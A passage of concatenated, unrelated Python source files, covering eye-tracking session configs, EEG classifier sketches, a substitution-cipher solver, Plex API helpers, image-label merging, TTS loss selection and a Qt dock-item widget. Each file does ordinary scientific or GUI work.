'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-27':
# subject information
initials = 'sub-27'
firstName = 'sub-27'
standardFSID = 'sub-27_010100'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 10, 11)
sj_session1 = 'sub-27_111017'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
####################################################################################################################################################################################
if which_subject == 'sub-28':
# subject information
initials = 'sub-28'
firstName = 'sub-28'
standardFSID = 'sub-28_010100'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 7, 19)
sj_session1 = 'sub-28_190717'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
|
StarcoderdataPython
|
119269
|
<filename>confused_stud/trash.py
# NOTE this is what they did for the students dataset
# Some nonsense to help you select features that will best predict the label
# y=pd.get_dummies(df['user-definedlabeln'])
# mi_score=mutual_info_classif(df.drop('user-definedlabeln',axis=1),df['user-definedlabeln'])
# mi_score=pd.Series(mi_score,index=df.drop('user-definedlabeln',axis=1).columns)
# mi_score=(mi_score*100).sort_values(ascending=False)
# print(mi_score)
# Selects the top 14 features
# print(mi_score.head(14).index)
# top_fea=['VideoID', 'Attention', 'Alpha2', 'Delta', 'Gamma1', 'Theta', 'Beta1',
# 'Alpha1', 'Mediation', 'Gamma2', 'SubjectID', 'Beta2', 'Raw', 'age']
# Set to zero mean and unit variance (i.e. subtract the mean and divide by the standard deviation). This assumes thin tails.
# https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.StandardScaler.html
# df_sc=StandardScaler().fit_transform(df[top_fea])
# TODO pytorch this shit -- a rough PyTorch sketch is appended at the end of this file
# import tensorflow as tf
# from tensorflow import keras
# from tensorflow.keras import callbacks,layers
# TODO train/test split
# from sklearn.model_selection import train_test_split
# Xtr,xte,Ytr,yte=train_test_split(df_sc,y,random_state=108,test_size=0.27)
# xtr,xval,ytr,yval=train_test_split(Xtr,Ytr,random_state=108,test_size=0.27)
# TODO this is their model, probably too big for what we want to run, but I could be wrong!
# I'm willing to bet their network is overfitted
# Model-Building step, stacking the hidden layers
# model=keras.Sequential([
# layers.Dense(64,input_shape=(14,),activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.27),
# layers.Dense(124,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.3),
# layers.Dense(248,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.32),
# layers.Dense(512,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.27),
# layers.Dense(664,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.3),
# layers.Dense(512,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.32),
# layers.Dense(264,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.27),
# layers.Dense(124,activation='relu'),
# layers.BatchNormalization(),
# layers.Dropout(0.3),
# layers.Dense(2,activation='sigmoid')
# ])
# Compiling the model with Adamax Optimizer
# model.compile(optimizer='adamax',loss='binary_crossentropy',metrics='accuracy')
# Creating the callback feature to stop the training in-Between, in case of no improvement
# call=callbacks.EarlyStopping(patience=20,min_delta=0.0001,restore_best_weights=True)
# Fitting the model to the training data
# history=model.fit(xtr,ytr,validation_data=(xval,yval),batch_size=28,epochs=150,callbacks=[call])
# Testing on the testing data
# model.evaluate(xte,yte)
# training=pd.DataFrame(history.history)
# training.loc[:,['loss','val_loss']].plot()
# training.loc[:,['accuracy','val_accuracy']].plot()
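# --------------------------------------------------------------------------------------
# Rough PyTorch counterpart to the commented-out Keras pipeline above (the "TODO pytorch"
# and "TODO train/test split" notes). This is a sketch, not the original authors' code:
# the split sizes, batch size and epoch count are carried over from the comments, the
# network is deliberately much smaller than the Keras stack (which the note above already
# suspects is overfitted), and a single-logit head with BCEWithLogitsLoss replaces the
# two-unit sigmoid output. Pass in your own feature matrix X and binary labels y.
import numpy as np
import torch
import torch.nn as nn
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
def train_confusion_classifier(X, y, epochs=150, batch_size=28, lr=1e-3):
    # Standardise features and hold out a test set, mirroring the commented-out split.
    X = StandardScaler().fit_transform(np.asarray(X)).astype(np.float32)
    y = np.asarray(y, dtype=np.float32)
    X_train, X_test, y_train, y_test = train_test_split(
        X, y, test_size=0.27, random_state=108)
    X_train = torch.from_numpy(X_train)
    y_train = torch.from_numpy(y_train).unsqueeze(1)
    X_test = torch.from_numpy(X_test)
    y_test = torch.from_numpy(y_test).unsqueeze(1)
    model = nn.Sequential(
        nn.Linear(X_train.shape[1], 64), nn.ReLU(), nn.Dropout(0.3),
        nn.Linear(64, 32), nn.ReLU(), nn.Dropout(0.3),
        nn.Linear(32, 1))
    optimiser = torch.optim.Adam(model.parameters(), lr=lr)
    loss_fn = nn.BCEWithLogitsLoss()
    model.train()
    for _ in range(epochs):
        perm = torch.randperm(len(X_train))
        for start in range(0, len(X_train), batch_size):
            idx = perm[start:start + batch_size]
            optimiser.zero_grad()
            loss = loss_fn(model(X_train[idx]), y_train[idx])
            loss.backward()
            optimiser.step()
    # Report held-out accuracy, roughly equivalent to model.evaluate(xte, yte) above.
    model.eval()
    with torch.no_grad():
        preds = (torch.sigmoid(model(X_test)) > 0.5).float()
        accuracy = (preds == y_test).float().mean().item()
    return model, accuracy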
|
StarcoderdataPython
|
184565
|
from tr import tr
with open('ciphertext.txt') as file:
data = file.read()
alpha = {letter: 0 for letter in 'abcdefghijklmnopqrstuvwxyz'}
# Find letter frequencies of ciphertext
for letter in data:
    try:
        alpha[letter] = alpha[letter] + 1
    except KeyError:
        # Ignore spaces, punctuation and anything else outside a-z
        continue
alphasort = {k: v for k, v in sorted(alpha.items(), key=lambda item: item[1])}
print(alphasort)
frequencies = ['e', 't', 'a', 'o', 'i']
dicto = 'ESIARNTOLCDUGPMKHBYFVWZXQJ'
texts = 'ETAOINSHRDLCUMWFGYPBVKXJQZ'
actual = 'ETASNRIOHDLPGBMCFUWYKVJZQX'
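# Substitute each ciphertext letter with the plaintext letter at the same frequency rank;
# `tr` is assumed to behave like Unix tr, mapping the i-th character of the first set
# onto the i-th character of the second.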
print(tr(u'ovymbkrsaenxhztjlcgqpwuifd', actual, data))
#clues: abilities, the, councels, cheats, attitude, spiderlike
'''
original text:
the next day peter finds he is no longer nearsighted and has developed spiderlike abilities
he can also shoot webs out of his wrists and has quick reflexes superhuman speed and strength
and a heightened ability to sense danger
having observed peters changed attitude ben confronts peter over this and counsels him that
with great power comes great responsibility peter ignores ben and enters an underground wrestling
tournament to win money with the intention to impress mary jane with a car
he wins his first match but the promoter cheats him of his earnings when a thief robs the promoters
office peter allows him to escape in retaliation moments later he finds that ben has been shot and
killed by a carjacker in the street
enraged peter pursues the carjacker only to learn that bens killer is the thief he let escape
the carjacker tries to flee but is killed after he falls out of a window
the goblin abducts and offers peter a place at his side but peter refuses during thanksgiving
dinner norman sees peters wound from a fight the previous day and realizes that he is spiderman
as revenge the goblin begins to strike at his loved ones hospitalizing may and taking mary jane
hostage alongside a tramcar full of children at queensboro bridge he tells peter to choose whether
to save mj or the children but peter manages to save both with some help from bystanders
'''
|
StarcoderdataPython
|
3260662
|
from typing import List
from xml.etree import ElementTree
import requests
import config
def section_create(section: str) -> None:
address = config.PLEX_SERVER_ADDRESS + '/library/sections'
headers = {
'X-Plex-Token': config.PLEX_TOKEN,
}
params = {
'name': section,
'type': 'show',
'agent': 'com.plexapp.agents.thetvdb',
'scanner': 'Plex Series Scanner',
'language': 'en',
'importFromiTunes': '',
'enableAutoPhotoTags': '',
# Specifies an arbitrary default location
'location': ('/non-existant-path/' + section)
}
response = requests.post(address, headers=headers, params=params)
def section_get_key(section: str) -> str:
    headers = {
        'X-Plex-Token': config.PLEX_TOKEN,
    }
    xml = requests.get(config.PLEX_SERVER_ADDRESS + '/library/sections',
                       headers=headers)
    tree = ElementTree.fromstring(xml.content)
    sectionkey = tree.find("./Directory[@title='" + section +
                           "']").attrib["key"]
    return sectionkey
def section_set_locations(sectionkey: str, paths: List[str]):
address = config.PLEX_SERVER_ADDRESS + '/library/sections/' + str(
sectionkey)
headers = {
'X-Plex-Token': config.PLEX_TOKEN,
}
params = {'agent': 'com.plexapp.agents.thetvdb', 'location': paths}
response = requests.put(address, headers=headers, params=params)
|
StarcoderdataPython
|
88937
|
<filename>tools/mergeneighboursinlabelimage/mergeneighboursinlabelimage.py
import argparse
import sys
import skimage.io
import skimage.util
from skimage.measure import regionprops
import scipy.spatial.distance
import numpy as np
import warnings
def merge_n(img, dist=50):
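    # Merge any two labelled objects whose closest pixels lie within `dist` of each
    # other by rewriting one object's pixels with the other's label, then recurse
    # until a full pass produces no further merges. The image is modified in place.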
props = regionprops(img)
found = False
for i in range(0, len(props)):
i_coords = props[i].coords
for q in range(0, len(props)):
if i==q:
continue
q_coords = props[q].coords
iq_dist = np.min(scipy.spatial.distance.cdist(i_coords, q_coords, 'euclidean'))
if iq_dist <= dist:
props[q].label = props[i].label
for a_point in range(0, q_coords.shape[0]):
img[q_coords[a_point, 0], q_coords[a_point, 1]] = props[i].label
found = True
if found:
merge_n(img, dist)
return img
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('input_file', type=argparse.FileType('r'), default=sys.stdin, help='input file')
    parser.add_argument('out_file', type=argparse.FileType('w'), default=sys.stdout, help='output file (TIFF)')
parser.add_argument(
'-c',
dest='cluster_merge',
type=int,
required=False,
default=50,
        help='Maximum distance in pixels between clusters that will be merged',
)
args = parser.parse_args()
label_image = skimage.io.imread(args.input_file.name)
label_image = merge_n(label_image, args.cluster_merge)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
res = skimage.util.img_as_uint(label_image)
skimage.io.imsave(args.out_file.name, res, plugin="tifffile")
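# Rough example invocation (file names and distance are placeholders):
#   python mergeneighboursinlabelimage.py input_label.tiff merged_label.tiff -c 30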
|
StarcoderdataPython
|
150775
|
<reponame>solider245/OpenData
# encoding: UTF-8
def remove_chinese(text):
    # Drop CJK characters (U+4E00 - U+9FA5) and keep everything else.
    s = ""
    for w in text:
        if w >= u'\u4e00' and w <= u'\u9fa5':
            continue
        s += w
    return s
def remove_non_numerical(s):
    # Return the longest numeric prefix of `s` as a string (e.g. u'12.5abc' -> '12.5').
    f = ''
    for i in range(len(s)):
        try:
            f = float(s[:i+1])
        except ValueError:
            return str(f)
    return str(f)
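# Rough usage notes, not part of the original module:
#   remove_chinese(u'价格12.5元')     -> u'12.5'  (CJK characters stripped)
#   remove_non_numerical(u'12.5abc')  -> '12.5'   (longest numeric prefix, as a string)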
|
StarcoderdataPython
|
138580
|
#
# SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import torch
import torch.nn as nn
from tacotron2.loss_function import Tacotron2Loss
from waveglow.loss_function import WaveGlowLoss
def get_loss_function(loss_function, sigma=1.0):
if loss_function == 'Tacotron2':
loss = Tacotron2Loss()
elif loss_function == 'WaveGlow':
loss = WaveGlowLoss(sigma=sigma)
else:
raise NotImplementedError(
"unknown loss function requested: {}".format(loss_function))
loss.cuda()
return loss
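# Rough usage sketch, not part of the original file: selecting a criterion by name.
# Note that get_loss_function() moves the loss module onto the GPU, so a CUDA-capable
# device is required.
# criterion = get_loss_function('Tacotron2')
# wg_criterion = get_loss_function('WaveGlow', sigma=1.0)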
|
StarcoderdataPython
|
1615693
|
"""
Entities containing shapes
.. automodule:: ote_sdk.entities.shapes.rectangle
:members:
:undoc-members:
.. automodule:: ote_sdk.entities.shapes.circle
:members:
:undoc-members:
.. automodule:: ote_sdk.entities.shapes.polygon
:members:
:undoc-members:
.. automodule:: ote_sdk.entities.shapes.shape
:members:
:undoc-members:
"""
# INTEL CONFIDENTIAL
#
# Copyright (C) 2021 Intel Corporation
#
# This software and the related documents are Intel copyrighted materials, and
# your use of them is governed by the express license under which they were provided to
# you ("License"). Unless the License provides otherwise, you may not use, modify, copy,
# publish, distribute, disclose or transmit this software or the related documents
# without Intel's prior written permission.
#
# This software and the related documents are provided as is,
# with no express or implied warranties, other than those that are expressly stated
# in the License.
# from .rectangle import *
# from .circle import *
# from .polygon import *
# from .shape import *
|
StarcoderdataPython
|
135234
|
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from enaml.qt.QtCore import Qt, QRect, QSize, QPoint, QTimer, Signal
from enaml.qt.QtGui import QApplication, QFrame, QLayout
from .event_types import (
QDockItemEvent, DockItemShown, DockItemHidden, DockItemClosed
)
from .q_dock_tab_widget import QDockTabWidget
from .q_dock_title_bar import QDockTitleBar
from .utils import repolish
class _AlertData(object):
""" A private class which stores the data needed for item alerts.
"""
def __init__(self, timer, level, on, off, repeat, persist):
self.timer = timer
self.level = level
self.on = on
self.off = off
self.repeat = repeat
self.persist = persist
self.remaining = repeat
self.active = False
class QDockItemLayout(QLayout):
""" A QLayout subclass for laying out a dock item.
"""
def __init__(self, parent=None):
""" Initialize a QDockAreaLayout.
Parameters
----------
parent : QWidget or None
The parent widget owner of the layout.
"""
super(QDockItemLayout, self).__init__(parent)
self._size_hint = QSize()
self._min_size = QSize()
self._max_size = QSize()
self._title_bar = None
self._dock_widget = None
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def titleBarWidget(self):
""" Get the title bar widget set for the layout.
Returns
-------
result : IDockItemTitleBar or None
The title bar widget for the layout, or None if no widget
is applied.
"""
return self._title_bar
def setTitleBarWidget(self, title_bar):
""" Set the title bar widget for the layout.
The old widget will be hidden and unparented, but not destroyed.
Parameters
----------
title_bar : IDockItemTitleBar or None
A concrete implementor of the title bar interface, or None.
"""
old_bar = self._title_bar
if old_bar is not None:
old_bar.hide()
old_bar.setParent(None)
self._title_bar = title_bar
if title_bar is not None:
title_bar.setParent(self.parentWidget())
self.invalidate()
def dockWidget(self):
""" Get the dock widget set for the layout.
Returns
-------
result : QWidget
The primary widget set in the dock item layout.
"""
return self._dock_widget
def setDockWidget(self, widget):
""" Set the dock widget for the layout.
The old widget will be hidden and unparented, but not destroyed.
Parameters
----------
widget : QWidget
The widget to use as the primary content in the layout.
"""
old_widget = self._dock_widget
if widget is old_widget:
return
if old_widget is not None:
old_widget.hide()
old_widget.setParent(None)
self._dock_widget = widget
if widget is not None:
widget.setParent(self.parentWidget())
self.invalidate()
#--------------------------------------------------------------------------
# QLayout API
#--------------------------------------------------------------------------
def invalidate(self):
""" Invalidate the layout.
"""
super(QDockItemLayout, self).invalidate()
self._size_hint = QSize()
self._min_size = QSize()
self._max_size = QSize()
def setGeometry(self, rect):
""" Set the geometry for the items in the layout.
"""
super(QDockItemLayout, self).setGeometry(rect)
title = self._title_bar
widget = self._dock_widget
title_rect = QRect(rect)
widget_rect = QRect(rect)
if title is not None and not title.isHidden():
msh = title.minimumSizeHint()
title_rect.setHeight(msh.height())
widget_rect.setTop(title_rect.bottom() + 1)
title.setGeometry(title_rect)
if widget is not None and not widget.isHidden():
widget.setGeometry(widget_rect)
def sizeHint(self):
""" Get the size hint for the layout.
"""
sh = self._size_hint
if not sh.isValid():
width = height = 0
title = self._title_bar
widget = self._dock_widget
if title is not None and not title.isHidden():
hint = title.sizeHint()
width += hint.width()
height += hint.height()
if widget is not None and not widget.isHidden():
hint = widget.sizeHint()
width = max(width, hint.width())
height += hint.height()
sh = self._size_hint = QSize(width, height)
return sh
def minimumSize(self):
""" Get the minimum size for the layout.
"""
ms = self._min_size
if not ms.isValid():
width = height = 0
title = self._title_bar
widget = self._dock_widget
if title is not None and not title.isHidden():
hint = title.minimumSizeHint()
width += hint.width()
height += hint.height()
if widget is not None and not widget.isHidden():
hint = widget.minimumSizeHint()
width = max(width, hint.width())
height += hint.height()
ms = self._min_size = QSize(width, height)
return ms
def maximumSize(self):
""" Get the maximum size for the layout.
"""
ms = self._max_size
if not ms.isValid():
widget = self._dock_widget
parent = self.parentWidget()
if widget is not None and parent.isFloating():
ms = widget.maximumSize()
title = self._title_bar
if title is not None and not title.isHidden():
height = ms.height() + title.minimumSizeHint().height()
ms.setHeight(min(16777215, height))
else:
ms = QSize(16777215, 16777215)
self._max_size = ms
return ms
#--------------------------------------------------------------------------
# QLayout Abstract API
#--------------------------------------------------------------------------
def addItem(self, item):
""" A required virtual method implementation.
"""
msg = 'Use `setTitleBarWidget | setDockWidget` instead.'
raise NotImplementedError(msg)
def count(self):
""" A required virtual method implementation.
This method should not be used and returns a constant value.
"""
return 0
def itemAt(self, idx):
""" A virtual method implementation which returns None.
"""
return None
def takeAt(self, idx):
""" A virtual method implementation which does nothing.
"""
return None
class QDockItem(QFrame):
""" A QFrame subclass which acts as an item QDockArea.
"""
#: A signal emitted when the maximize button is clicked. This
#: signal is proxied from the current dock item title bar.
maximizeButtonClicked = Signal(bool)
#: A signal emitted when the restore button is clicked. This
#: signal is proxied from the current dock item title bar.
restoreButtonClicked = Signal(bool)
#: A signal emitted when the close button is clicked. This
#: signal is proxied from the current dock item title bar.
closeButtonClicked = Signal(bool)
#: A signal emitted when the link button is toggled. This
#: signal is proxied from the current dock item title bar.
linkButtonToggled = Signal(bool)
#: A signal emitted when the pin button is toggled. This
#: signal is proxied from the current dock item title bar.
pinButtonToggled = Signal(bool)
#: A signal emitted when the title is edited by the user. This
#: signal is proxied from the current dock item title bar.
titleEdited = Signal(unicode)
#: A signal emitted when the empty area is left double clicked.
#: This signal is proxied from the current dock item title bar.
titleBarLeftDoubleClicked = Signal(QPoint)
#: A signal emitted when the empty area is right clicked. This
#: signal is proxied from the current dock item title bar.
titleBarRightClicked = Signal(QPoint)
#: A signal emitted when the item is alerted. The payload is the
#: new alert level. An empty string indicates no alert.
alerted = Signal(unicode)
def __init__(self, parent=None):
""" Initialize a QDockItem.
Parameters
----------
parent : QWidget, optional
The parent of the dock item.
"""
super(QDockItem, self).__init__(parent)
layout = QDockItemLayout()
layout.setContentsMargins(0, 0, 0, 0)
layout.setSizeConstraint(QLayout.SetMinAndMaxSize)
self.setLayout(layout)
self.setTitleBarWidget(QDockTitleBar())
self.alerted.connect(self._onAlerted)
self._manager = None # Set and cleared by the DockManager
self._alert_data = None
self._vis_changed = None
self._closable = True
self._closing = False
#--------------------------------------------------------------------------
# Reimplementations
#--------------------------------------------------------------------------
def close(self):
""" Handle the close request for the dock item.
"""
self._closing = True
try:
super(QDockItem, self).close()
finally:
self._closing = False
def closeEvent(self, event):
""" Handle the close event for the dock item.
This handler will reject the event if the item is not closable.
"""
event.ignore()
if self._closable:
event.accept()
area = self.rootDockArea()
if area is not None and area.dockEventsEnabled():
event = QDockItemEvent(DockItemClosed, self.objectName())
QApplication.postEvent(area, event)
def showEvent(self, event):
""" Handle the show event for the container.
This handler posts a visibility change event.
"""
super(QDockItem, self).showEvent(event)
self._postVisibilityChange(True)
def hideEvent(self, event):
""" Handle the hide event for the container.
This handler posts a visibility change event.
"""
super(QDockItem, self).hideEvent(event)
# Don't post when closing; A closed event is posted instead.
if not self._closing:
self._postVisibilityChange(False)
def mousePressEvent(self, event):
""" Handle the mouse press event for the dock item.
This handler will clear any alert level on a left click.
"""
if event.button() == Qt.LeftButton:
self.clearAlert()
super(QDockItem, self).mousePressEvent(event)
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
def manager(self):
""" Get the dock manager for this dock item.
Returns
-------
result : DockManager or None
The dock manager which is managing this item.
"""
return self._manager
def rootDockArea(self):
""" Get the root dock area for this dock item.
Returns
-------
result : QDockArea or None
The root dock area for this dock item.
"""
manager = self._manager
if manager is not None:
return manager.dock_area()
def title(self):
""" Get the title for the dock item.
Returns
-------
result : unicode
The unicode title for the dock item.
"""
return self.titleBarWidget().title()
def setTitle(self, title):
""" Set the title for the dock item.
Parameters
----------
title : unicode
The unicode title to use for the dock item.
"""
self.titleBarWidget().setTitle(title)
# A concession to practicality: walk the ancestry and update
# the tab title if this item lives in a dock tab.
container = self.parent()
if container is not None:
stacked = container.parent()
if stacked is not None:
tabs = stacked.parent()
if isinstance(tabs, QDockTabWidget):
index = tabs.indexOf(container)
tabs.setTabText(index, title)
def icon(self):
""" Get the icon for the dock item.
Returns
-------
result : QIcon
The icon in use for the dock item.
"""
return self.titleBarWidget().icon()
def setIcon(self, icon):
""" Set the icon for the dock item.
Parameters
----------
icon : QIcon
The icon to use for the dock item.
"""
self.titleBarWidget().setIcon(icon)
# A concession to practicality: walk the ancestry and update
# the tab icon if this item lives in a dock tab.
container = self.parent()
if container is not None:
stacked = container.parent()
if stacked is not None:
tabs = stacked.parent()
if isinstance(tabs, QDockTabWidget):
index = tabs.indexOf(container)
tabs.setTabIcon(index, icon)
def iconSize(self):
""" Get the icon size for the title bar.
Returns
-------
result : QSize
The size to use for the icons in the title bar.
"""
return self.titleBarWidget().iconSize()
def setIconSize(self, size):
""" Set the icon size for the title bar.
Parameters
----------
        size : QSize
The icon size to use for the title bar. Icons smaller than
this size will not be scaled up.
"""
self.titleBarWidget().setIconSize(size)
def isLinked(self):
""" Get whether or not this dock item is linked.
Returns
-------
result : bool
True if the item is linked, False otherwise.
"""
return self.titleBarWidget().isLinked()
def setLinked(self, linked):
""" Set whether or not the dock item is linked.
Parameters
----------
linked : bool
True if the dock item should be linked, False otherwise.
"""
self.titleBarWidget().setLinked(linked)
def isPinned(self):
""" Get whether or not this dock item is pinned.
Returns
-------
result : bool
True if the item is pinned, False otherwise.
"""
return self.titleBarWidget().isPinned()
def setPinned(self, pinned, quiet=False):
""" Set whether or not the dock item is pinned.
Parameters
----------
pinned : bool
True if the dock item should be pinned, False otherwise.
quiet : bool, optional
            True if the state should be set without emitting the toggled
signal. The default is False.
"""
self.titleBarWidget().setPinned(pinned, quiet)
def isFloating(self):
""" Get whether the dock item is free floating.
"""
container = self.parent()
if container is not None:
return container.isWindow()
return self.isWindow()
def titleEditable(self):
""" Get whether the title is user editable.
Returns
-------
result : bool
True if the title is user editable, False otherwise.
"""
return self.titleBarWidget().isEditable()
def setTitleEditable(self, editable):
""" Set whether or not the title is user editable.
Parameters
----------
editable : bool
True if the title is user editable, False otherwise.
"""
self.titleBarWidget().setEditable(editable)
def titleBarForceHidden(self):
""" Get whether or not the title bar is force hidden.
Returns
-------
result : bool
Whether or not the title bar is force hidden.
"""
return self.titleBarWidget().isForceHidden()
def setTitleBarForceHidden(self, hidden):
""" Set the force hidden state of the title bar.
Parameters
----------
hidden : bool
True if the title bar should be hidden, False otherwise.
"""
self.titleBarWidget().setForceHidden(hidden)
def closable(self):
""" Get whether or not the dock item is closable.
Returns
-------
result : bool
True if the dock item is closable, False otherwise.
"""
return self._closable
def setClosable(self, closable):
""" Set whether or not the dock item is closable.
Parameters
----------
closable : bool
True if the dock item is closable, False otherwise.
"""
if closable != self._closable:
self._closable = closable
bar = self.titleBarWidget()
buttons = bar.buttons()
if closable:
buttons |= bar.CloseButton
else:
buttons &= ~bar.CloseButton
bar.setButtons(buttons)
# A concession to practicality: walk the ancestry and update
# the tab close button if this item lives in a dock tab.
container = self.parent()
if container is not None:
stacked = container.parent()
if stacked is not None:
tabs = stacked.parent()
if isinstance(tabs, QDockTabWidget):
index = tabs.indexOf(container)
tabs.setCloseButtonVisible(index, closable)
def titleBarWidget(self):
""" Get the title bar widget for the dock item.
If a custom title bar has not been assigned, a default title
bar will be returned. To prevent showing a title bar, set the
visibility on the returned title bar to False.
Returns
-------
result : IDockItemTitleBar
An implementation of IDockItemTitleBar. This will never be
None.
"""
layout = self.layout()
bar = layout.titleBarWidget()
if bar is None:
bar = QDockTitleBar()
self.setTitleBarWidget(bar)
return bar
def setTitleBarWidget(self, title_bar):
""" Set the title bar widget for the dock item.
Parameters
----------
title_bar : IDockItemTitleBar or None
A custom implementation of IDockItemTitleBar, or None. If
None, then the default title bar will be restored.
"""
layout = self.layout()
old = layout.titleBarWidget()
if old is not None:
old.maximizeButtonClicked.disconnect(self.maximizeButtonClicked)
old.restoreButtonClicked.disconnect(self.restoreButtonClicked)
old.closeButtonClicked.disconnect(self.closeButtonClicked)
old.linkButtonToggled.disconnect(self.linkButtonToggled)
old.pinButtonToggled.disconnect(self.pinButtonToggled)
old.titleEdited.disconnect(self.titleEdited)
old.leftDoubleClicked.disconnect(self.titleBarLeftDoubleClicked)
old.rightClicked.disconnect(self.titleBarRightClicked)
title_bar = title_bar or QDockTitleBar()
title_bar.maximizeButtonClicked.connect(self.maximizeButtonClicked)
title_bar.restoreButtonClicked.connect(self.restoreButtonClicked)
title_bar.closeButtonClicked.connect(self.closeButtonClicked)
title_bar.linkButtonToggled.connect(self.linkButtonToggled)
title_bar.pinButtonToggled.connect(self.pinButtonToggled)
title_bar.titleEdited.connect(self.titleEdited)
